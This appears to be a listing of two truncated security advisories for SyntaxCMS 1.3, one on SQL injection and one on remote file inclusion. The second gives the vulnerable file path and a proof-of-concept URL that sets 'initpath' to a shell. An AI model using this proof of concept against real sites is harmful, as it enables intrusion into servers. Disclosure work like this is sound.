SyntaxCMS 1.3 SQL Injection

Vulnerability ID: HTB22540 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityinsyntaxcms.html Product: SyntaxCMS Vendor: Forum One Communications http://www.syntaxcms.org/ Vulnerable Version: 1.3 and Probably Prior Versions Vendor Notification: 27 July 2010 Vulnerability Type: S...

SyntaxCMS 1.3 Remote File Inclusion

SyntaxCMS Download: Date: 13.02.2010 Remote: yes Vuln : SyntaxCMSpath/public/admin/testing/tests/0004initurls.php includeonce $initpath . '/init.urls.php' ; PoC : SyntaxCMSpath/admin/testing/tests/0004initurls.php?initpath=Shell GreetZ : myself...